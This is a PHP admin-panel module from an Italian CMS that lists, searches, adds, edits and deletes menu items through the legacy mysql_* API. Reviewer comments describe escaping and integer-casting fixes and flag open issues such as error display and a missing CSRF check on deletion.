
<?php
// Report every PHP error level while this module is loaded.
// NOTE(review): whether these messages reach the browser depends on display_errors,
// which is not set in this file — on a live admin panel confirm it is off so that
// SQL errors and filesystem paths are logged rather than shown to the client.
error_reporting(E_ALL);
////////////////////////// MENU ITEMS
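/**
 * Renders the menu-item list screen: heading, search form, "Inserisci" button
 * and a table with one row per record in `menu`, ordered by rank.
 *
 * Uses the LISTA, MENU, LIV, CONT and RANK constants, which are defined outside
 * this file, and the default mysql_* connection.
 *
 * @return string HTML fragment for the caller to print
 */
function listav() {
	global $conn, $id;

	// Database values are escaped before being placed in HTML so that a menu name
	// or page title containing markup is shown as text instead of being rendered
	// (stored XSS in the admin panel).
	// NOTE(review): the charset argument is left at the PHP default because the
	// page encoding is not visible in this file.
	$esc = function ($value) {
		return htmlspecialchars((string) $value, ENT_QUOTES);
	};

	$output = 	'<div class="row">
					<div class="col-md-6">
						<div class="headline">
							<h3>' . LISTA . ' ' . MENU . '</h3> 
						</div>
					</div>					 
					<div class="col-md-6"> 
						<a href="?azione=inserisciv" class="btn btn-default pull-right"><i class="icon-plus"></i> Inserisci</a>

						<form class="form-search pull-right" enctype="multipart/form-data" action="?azione=resultv" method="post">
							<div class="input-group"style="margin-right:10px">
								<input class="form-control" type="text"  name="ricerca">
								<span class="input-group-btn">
									<button class="btn btn-default" type="submit"><i class="icon-search"></i></button>
								</span>
							</div>						
						</form>	
					</div>		
				</div>'; 

	$output .= '<div class="row">		
					<div class="col-md-12">
						<div class="table-wrapper">

				    		<div class="wrapper-panel">     
				    		<table class="table table-striped" id="tab" > 
				      			<thead>
									<tr>
									    <th>'.MENU.'</th>	
									    <th>'.LIV.'</th>	   
									    <th>'.CONT.'</th>	
									    <th>Menu a discesa</th>	
									    <th>'.RANK.'</th>	 
   									    <th width="5%"></th>	
									    <th width="5%"></th>	   							    
									</tr>
								</thead>
				      			<tbody>';

	$result = mysql_query('select p1.id as id, p1.nome as nome, p1.toggle as toggle, p2.nome as padre, p1.rank as rank, pg1.pg_titolo as contenuto from menu as p1 LEFT JOIN menu as p2 on p1.padre=p2.id 
    				LEFT JOIN pages as pg1 on pg1.pg_id = p1.rif
    				order by rank ASC');

	// A failed query yields false; skip the loop instead of fetching from it.
	if ($result !== false) {
		while ($array = mysql_fetch_assoc($result)) {
			// The self-join returns NULL for "padre" when the row has no parent.
			if ($array['padre'] == NULL) {
				$array['padre'] = 'Primo Livello';
			}
			// The original tested "padre" for NULL a second time, after it had
			// just been overwritten, to set toggle to 'x'. That branch could never
			// run, so it is dropped; the rendered value is unchanged.

			if ($array['toggle'] == 0) {
				$array['toggle'] = 'NO';
			} elseif ($array['toggle'] == 1) {
				$array['toggle'] = 'SI';
			}

			$rowId = $esc($array['id']);

			$output .= '<tr>';
			$output .= '<td>' . $esc($array['nome']) . '</td>';
			$output .= '<td>' . $esc($array['padre']) . '</td>';
			$output .= '<td>' . $esc($array['contenuto']) . '</td>';
			$output .= '<td>' . $esc($array['toggle']) . '</td>';
			$output .= '<td>' . $esc($array['rank']) . '</td>';
			$output .= '<td><a title="Modifica" href="?azione=modificav&id='.$rowId.'"><i class="icon-edit"></i></a></td>';
			$output .= '<td><a class="right cancel show-option" title="Elimina" href="?azione=eliminav&id='.$rowId.'" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"><i class="icon-remove-sign"></i></a></td>';
			$output .= '</tr>';
		}
	}

	$output .= '</tbody>
			    </table>
			</div>
			    			<div class="wrapper-paging pull-right">
			      				<ul>
									<li><a class="paging-back">&lt;</a></li>
									<li><a class="paging-this">Pagina <strong>0</strong> di <span>x</span></a></li>
									<li><a class="paging-next">&gt;</a></li>
								</ul>
			    			</div>	<br /><br /> 		
	    </div>	 
	</div>
</div>';

	return ($output);
}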

//////////////////////////VOCI DI MENU
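/**
 * Renders the menu-item list filtered by the search term posted as "ricerca".
 *
 * Same layout as the unfiltered list; rows are those whose `menu.nome`
 * contains the term. Uses the LISTA, MENU, LIV, CONT and RANK constants,
 * which are defined outside this file.
 *
 * @return string HTML fragment for the caller to print
 */
function resultv() {
	global $conn, $id;

	// The search box may be submitted empty or the action opened directly,
	// so do not assume the POST key exists.
	$ricerca = isset($_POST['ricerca']) ? $_POST['ricerca'] : '';

	// NOTE(review): mysql_real_escape_string() is only reliable when the
	// connection charset was set with mysql_set_charset(); that call is not
	// visible in this file — confirm where the connection is opened.
	$ricerca = mysql_real_escape_string($ricerca);

	// Database values are escaped before being placed in HTML so that stored
	// markup is displayed as text (stored XSS in the admin panel).
	// NOTE(review): charset left at the PHP default; page encoding not visible here.
	$esc = function ($value) {
		return htmlspecialchars((string) $value, ENT_QUOTES);
	};

	$output = 	'<div class="row">
					<div class="col-md-6">
						<div class="headline">
							<h3>' . LISTA . ' ' . MENU . '</h3> 
						</div>
					</div>					 
					<div class="col-md-6"> 
						<a href="?azione=inserisciv" class="btn btn-default pull-right"><i class="icon-plus"></i> Inserisci</a>

						<form class="form-search pull-right" enctype="multipart/form-data" action="?azione=resultv" method="post">
							<div class="input-group"style="margin-right:10px">
								<input class="form-control" type="text"  name="ricerca">
								<span class="input-group-btn">
									<button class="btn btn-default" type="submit"><i class="icon-search"></i></button>
								</span>
							</div>						
						</form>	
					</div>		
				</div>'; 

	$output .= '<div class="row">		
					<div class="col-md-12">
						<div class="table-wrapper">

				    		<div class="wrapper-panel">     
				    		<table class="table table-striped" id="tab" > 
				      			<thead>
									<tr>
									    <th>'.MENU.'</th>	
									    <th>'.LIV.'</th>	   
									    <th>'.CONT.'</th>	
									    <th>Menu a discesa</th>	
									    <th>'.RANK.'</th>	 
   									    <th width="5%"></th>	
									    <th width="5%"></th>	   							    
									</tr>
								</thead>
				      			<tbody>';

	$result = mysql_query('select p1.id as id, p1.nome as nome, p1.toggle as toggle, p2.nome as padre, p1.rank as rank, pg1.pg_titolo as contenuto from menu as p1 LEFT JOIN menu as p2 on p1.padre=p2.id 
    				LEFT JOIN pages as pg1 on pg1.pg_id = p1.rif where p1.nome like \'%' . $ricerca . '%\' order by rank ASC');

	// A failed query yields false; skip the loop instead of fetching from it.
	if ($result !== false) {
		while ($array = mysql_fetch_assoc($result)) {
			// The self-join returns NULL for "padre" when the row has no parent.
			if ($array['padre'] == NULL) {
				$array['padre'] = 'Primo Livello';
			}
			// The original repeated the NULL test after "padre" had been
			// overwritten; that branch was unreachable and is dropped.

			if ($array['toggle'] == 0) {
				$array['toggle'] = 'NO';
			} elseif ($array['toggle'] == 1) {
				$array['toggle'] = 'SI';
			}

			// Fix: the links used $row['pg_id'], but no $row exists in this
			// function and the query exposes the key as "id", so every
			// edit/delete link was emitted with an empty id.
			$rowId = $esc($array['id']);

			$output .= '<tr>';
			$output .= '<td>' . $esc($array['nome']) . '</td>';
			$output .= '<td>' . $esc($array['padre']) . '</td>';
			$output .= '<td>' . $esc($array['contenuto']) . '</td>';
			$output .= '<td>' . $esc($array['toggle']) . '</td>';
			$output .= '<td>' . $esc($array['rank']) . '</td>';
			$output .= '<td><a title="Modifica" href="?azione=modificav&id='.$rowId.'"><i class="icon-edit"></i></a></td>';
			$output .= '<td><a class="right cancel show-option" title="Elimina" href="?azione=eliminav&id='.$rowId.'" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"><i class="icon-remove-sign"></i></a></td>';
			$output .= '</tr>';
		}
	}

	$output .= '</tbody>
			    </table>
			</div>
			    			<div class="wrapper-paging pull-right">
			      				<ul>
									<li><a class="paging-back">&lt;</a></li>
									<li><a class="paging-this">Pagina <strong>0</strong> di <span>x</span></a></li>
									<li><a class="paging-next">&gt;</a></li>
								</ul>
			    			</div>	<br /><br /> 		
	    </div>	 
	</div>
</div>';

	return ($output);
}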





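/**
 * Renders the "add menu item" form: Italian and English title, level,
 * parent item, dropdown flag, associated page and rank.
 *
 * The form posts to ?azione=salvav with the current global $id. Uses the ADD,
 * MENU, TITOLO, LIV, SEL, PLIV, SUB, RANK and SALVA constants, which are
 * defined outside this file.
 *
 * @return string HTML fragment for the caller to print
 */
function inserisciv() {
	global $conn, $id;

	// Everything interpolated into attributes or option labels is escaped so a
	// quote or tag in the data cannot break out of the surrounding markup.
	// NOTE(review): charset left at the PHP default; page encoding not visible here.
	$esc = function ($value) {
		return htmlspecialchars((string) $value, ENT_QUOTES);
	};

	$output = '<div class="row">
					<div class="col-md-10">
						<div class="headline">
							<h3>'.ADD.' '.MENU.'</h3>
						</div>
					</div>
					
					<div class="col-md-2">
						<a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a>
					</div>

				</div>';

	// $id is set outside this file. NOTE(review): presumably taken from the
	// request — it is escaped here because it lands inside an HTML attribute.
	$output .= '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvav&id=' . $esc($id) . '" method="post">
				<div class="row">
					<div class="col-md-4">
						<label>' . TITOLO . '</label>
						<input class="form-control" type="text" placeholder="Type something…" name="nome">
					</div>
					<div class="col-md-4">
						<label>' . TITOLO . ' [English]</label>
						<input class="form-control" type="text" placeholder="Type something…" name="nome_en">
					</div>
				</div>	
				<br />
				<div class="row">
					<div class="col-md-4">';
	$output .= '<label for="livello">' . LIV . '</label><br />';
	$output .= '<select class="form-control" name="livello" id="livello" onchange="controlla()">';
	$output .= '<option value="seleziona">' . SEL . '</option>';
	$output .= '<option value="primo">' . PLIV . '</option>';
	$output .= '<option value="sotto">' . SUB . '</option>';
	$output .= '</select><br />';

	$output .= '</div>
				</div>
				<div class="row">
					<div class="col-md-4">';
	$output .= '<span id="sottolivello">';
	$output .= '<label for="sottolivello">Voce di Menù Padre</label><br />';
	$output .= '<select class="form-control" name="sottolivello" id="sottolivello">';
	$output .= '<option value="0">' . SEL . '</option>';

	// Fix: the original fetched one row before the loop and discarded it, so
	// the first top-level menu item never appeared as a selectable parent.
	$sql = 'select * from menu WHERE padre=0 order by id ASC';
	$dati_voce = mysql_query($sql) or die(mysql_error());
	while ($array_voce = mysql_fetch_array($dati_voce)) {
		$output .= '<option value="' . $esc($array_voce['id']) . '">' . $esc($array_voce['nome']) . '</option>';
	}
	$output .= '</select><br />';
	$output .= '</span>';

	$output .= '</div>
				</div>				
				<div class="row">
					<div class="col-md-4">';
	$output .= '<span id="check">';	
	$output .= '<label for="toggle">La voce di menù dei sottolivelli?</label><br />';
	$output .= '<input type="radio" id="toggle" name="toggle" value="0" /> NO<br />';
	$output .= '<input type="radio" id="toggle" name="toggle" value="1"/> SI';
	$output .= '</span><br /><br />'; 

	$output .= '</div>
				</div>		
				<div class="row">
					<div class="col-md-4">';
	$output .= '<label for="contenuto">Contenuto Associato</label><br />';
	$output .= '<select class="form-control" name="contenuto" id="contenuto">';
	$output .= '<option value="0">' . SEL . '</option>';

	// Same fix as above: no row is thrown away before the loop, so the first
	// page is offered too.
	$sql2 = 'select * from pages order by pg_id ASC';
	$dati_voce2 = mysql_query($sql2) or die(mysql_error());
	while ($array_voce2 = mysql_fetch_array($dati_voce2)) {
		$output .= '<option value="' . $esc($array_voce2['pg_id']) . '">' . $esc($array_voce2['pg_titolo']) . '</option>';
	}

	$output .= '</select><br />';
	$output .= '</div>
				</div>	
				<div class="row">
					<div class="col-md-4">';
	$output .= '<label for="rank">' . RANK . '</label><br />';
	$output .= '<input class="form-control" type="text" id="rank" style="width:50px" name="rank" /><br /><br />';
	$output .= '</div>
				</div>	

				<button class="btn btn-default" type="submit">' . SALVA . '</button>
				<br /><br />
				</form>';	

	return ($output);
}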


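/**
 * Saves the posted menu form: inserts a new row into `menu` and `menu_en`
 * when the global $id is 0, otherwise updates the rows with that id, then
 * sends a redirect header back to the list.
 *
 * @return string empty on success, or an error message with a back link
 */
function salvav() {
	global $conn, $id;
	$errore = 0;

	// Fix: $output was only assigned in the error branch, so the normal path
	// returned an undefined variable.
	$output = '';

	// An unchecked radio button or a hand-built request leaves keys out of
	// $_POST; read them with a default instead of raising notices.
	$campi = array('nome', 'nome_en', 'toggle', 'contenuto', 'sottolivello', 'rank');
	$valori = array();
	foreach ($campi as $campo) {
		$grezzo = isset($_POST[$campo]) ? $_POST[$campo] : '';
		// NOTE(review): escaping is only reliable when the connection charset
		// was set with mysql_set_charset(); not visible in this file.
		$valori[$campo] = mysql_real_escape_string($grezzo);
	}
	$nome = $valori['nome'];
	$nome_en = $valori['nome_en'];
	$toggle = $valori['toggle'];
	$rif = $valori['contenuto'];
	$padre = $valori['sottolivello'];
	$rank = $valori['rank'];

	// Fix: $id was concatenated into the UPDATE statements without escaping.
	// It is set outside this file (NOTE(review): presumably from the request),
	// so force it to an integer before it reaches SQL.
	$menuId = (int) $id;

	if ($errore == 0) {
		if ($menuId === 0) {
			$sql = 'insert into menu(nome,padre,rank,rif,toggle) values("' . $nome . '","' . $padre . '","' . $rank . '","' . $rif . '","' . $toggle . '")';
			mysql_query($sql, $conn) or die(mysql_error());

			$sql_en = 'insert into menu_en(nome,padre,rank,rif,toggle) values("' . $nome_en . '","' . $padre . '","' . $rank . '","' . $rif . '","' . $toggle . '")';
			mysql_query($sql_en, $conn) or die(mysql_error());

			header('location: cms.php?ins&azione=listav');
			// NOTE(review): this runs after the menu_en insert, so it yields the
			// menu_en id; the updates below assume both tables share ids — confirm.
			$id = mysql_insert_id();
		} else {
			$sql = 'update menu set nome="' . $nome . '", padre="' . $padre . '", rank="' . $rank . '", rif="' . $rif . '", toggle="' . $toggle . '" where id="' . $menuId . '"';
			mysql_query($sql, $conn) or die(mysql_error());

			$sql = 'update menu_en set nome="' . $nome_en . '", padre="' . $padre . '", rank="' . $rank . '", rif="' . $rif . '", toggle="' . $toggle . '" where id="' . $menuId . '"';
			mysql_query($sql, $conn) or die(mysql_error());

			header('location: cms.php?agg&azione=listav');
		}
	} else {
		// Unreachable while $errore is never set; kept as the hook for form validation.
		$output = 'errore nel form.<br /><a href="javascript:history.go(-1)">Torna indietro</a>';
	}

	return ($output);
}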



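/**
 * Renders the "edit menu item" form for the row identified by the global $id,
 * pre-filled from `menu` (Italian) and `menu_en` (English).
 *
 * Uses the MOD, MENU, TITOLO, LIV, SEL, PLIV, SUB, RANK and SALVA constants,
 * which are defined outside this file.
 *
 * @return string HTML fragment for the caller to print
 */
function modificav() {
	global $conn, $id;

	// Fix: $id was concatenated into five queries, two of them in an unquoted
	// numeric position, with no escaping. It is set outside this file
	// (NOTE(review): presumably from the request), so force it to an integer
	// before it reaches SQL or HTML.
	$menuId = (int) $id;

	// Stored values are escaped before being placed in attributes and option
	// labels so a quote or tag in the data cannot break out of the markup.
	// NOTE(review): charset left at the PHP default; page encoding not visible here.
	$esc = function ($value) {
		return htmlspecialchars((string) $value, ENT_QUOTES);
	};

	$sql = 'select * from menu where id="' . $menuId . '" order by id ASC';
	$dati_voce = mysql_query($sql) or die(mysql_error());
	$array_voce = mysql_fetch_array($dati_voce);

	$sql_en = 'select * from menu_en where id="' . $menuId . '" order by id ASC';
	$dati_voce_en = mysql_query($sql_en) or die(mysql_error());
	$array_voce_en = mysql_fetch_array($dati_voce_en);

	$output = '<div class="row">
					<div class="col-md-10">
						<div class="headline">
							<h3>'.MOD.' '.MENU.'</h3>
						</div>
					</div>
					
					<div class="col-md-2">
						<a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a>
					</div>

				</div>';

	$output .= '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvav&id=' . $menuId . '" method="post">
				<div class="row">
					<div class="col-md-4">
						<label>' . TITOLO . '</label>
						<input class="form-control" type="text" placeholder="Type something…" name="nome" value="'.$esc($array_voce['nome']).'">
					</div>
					<div class="col-md-4">
						<label>' . TITOLO . ' [English]</label>
						<input class="form-control" type="text" placeholder="Type something…" name="nome_en" value="'.$esc($array_voce_en['nome']).'">
					</div>		
				</div>	
				<br />
				<div class="row">
					<div class="col-md-4">';
	$output .= '<label for="livello">' . LIV . '</label><br />';
	$output .= '<select class="form-control" name="livello" id="livello" onchange="controlla()">';
	$output .= '<option value="seleziona">' . SEL . '</option>';
	$output .= '<option value="primo">' . PLIV . '</option>';
	$output .= '<option value="sotto">' . SUB . '</option>';
	$output .= '</select><br />';

	$output .= '</div>
				</div>
				<div class="row">
					<div class="col-md-4">';
	$output .= '<span id="sottolivello">';
	$output .= '<label for="sottolivello">Voce di Menù Padre</label><br />';
	$output .= '<select class="form-control" name="sottolivello" id="sottolivello">';

	// First option: the item's current parent, so it is selected by default.
	$sql = 'SELECT m1.id, m1.nome from menu m LEFT JOIN menu m1 on m.padre = m1.id WHERE m.id = ' . $menuId . ' ';
	$dati_voce_check = mysql_query($sql) or die(mysql_error());   
	$array_voce_check = mysql_fetch_array($dati_voce_check);	
	$output .= '<option value="' . $esc($array_voce_check['id']) . '">' . $esc($array_voce_check['nome']) . '</option>';

	// Fix: the original fetched one row before the loop and discarded it, so
	// the first top-level menu item never appeared as a selectable parent.
	$sql = 'select * from menu WHERE padre=0 order by id ASC';
	$dati_voce_padre = mysql_query($sql) or die(mysql_error());
	while ($array_voce_padre = mysql_fetch_array($dati_voce_padre)) {
		$output .= '<option value="' . $esc($array_voce_padre['id']) . '">' . $esc($array_voce_padre['nome']) . '</option>';
	}
	$output .= '</select><br />';
	$output .= '</span>';

	$output .= '</div>
				</div>				
				<div class="row">
					<div class="col-md-4">';
	$output .= '<span id="check">';	
	$output .= '<label for="toggle">La voce di menù dei sottolivelli?</label><br />';
	// A leading space keeps "checked" from running into the value attribute.
	$output .= '<input type="radio" id="toggle" name="toggle" value="0"' . ($array_voce['toggle'] == 0 ? ' checked' : '') . '/> NO<br />';
	$output .= '<input type="radio" id="toggle" name="toggle" value="1"' . ($array_voce['toggle'] == 1 ? ' checked' : '') . '/> SI<br />';
	$output .= '</span><br /><br />'; 

	$output .= '</div>
				</div>		
				<div class="row">
					<div class="col-md-4">';
	$output .= '<label for="contenuto">Contenuto Associato</label><br />';
	$output .= '<select class="form-control" name="contenuto" id="contenuto">';

	// First option: the page currently linked to this item.
	$sql3 = 'SELECT pg_titolo, pg_id from pages p LEFT JOIN menu m on m.rif = p.pg_id WHERE m.id =' . $menuId . '';
	$dati_voce3 = mysql_query($sql3) or die(mysql_error());
	$array_voce3 = mysql_fetch_array($dati_voce3); 
	$output .= '<option value="' . $esc($array_voce3['pg_id']) . '">' . $esc($array_voce3['pg_titolo']) . '</option>';

	$output .= '<option value="0">' . SEL . '</option>';

	// Same fix as for the parent list: no row is thrown away before the loop.
	$sql2 = 'select * from pages order by pg_id ASC';
	$dati_voce2 = mysql_query($sql2) or die(mysql_error());
	while ($array_voce2 = mysql_fetch_array($dati_voce2)) {
		$output .= '<option value="' . $esc($array_voce2['pg_id']) . '">' . $esc($array_voce2['pg_titolo']) . '</option>';
	}

	$output .= '</select><br />';
	$output .= '</div>
				</div>	
				<div class="row">
					<div class="col-md-4">';
	$output .= '<label for="rank">' . RANK . '</label><br />';
	$output .= '<input class="form-control" type="text" id="rank" style="width:50px" name="rank" value="'.$esc($array_voce['rank']).'" /><br /><br />';
	$output .= '</div>
				</div>	

				<button class="btn btn-default" type="submit">' . SALVA . '</button>
				<br /><br />
				</form>';		

	return ($output);
}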



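/**
 * Deletes the `menu` row identified by the global $id and sends a redirect
 * header back to the list view.
 *
 * NOTE(review): the list view links to this action with a plain GET guarded
 * only by a JavaScript confirm(); no request-method or CSRF-token check is
 * visible in this function — confirm the caller enforces one.
 * NOTE(review): salvav() writes both `menu` and `menu_en`, but only `menu`
 * is cleaned up here — confirm whether the English row should be removed too.
 *
 * @return void
 */
function eliminav() {
	global $conn, $id;

	// Fix: $id was concatenated into the DELETE without escaping. It is set
	// outside this file (NOTE(review): presumably from the request), so force
	// it to an integer; a non-numeric value becomes 0.
	$menuId = (int) $id;

	$sql = 'delete from menu where id="' . $menuId . '"';
	mysql_query($sql) or die(mysql_error());
	header('location: index.php?del&azione=listav');
}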



?>
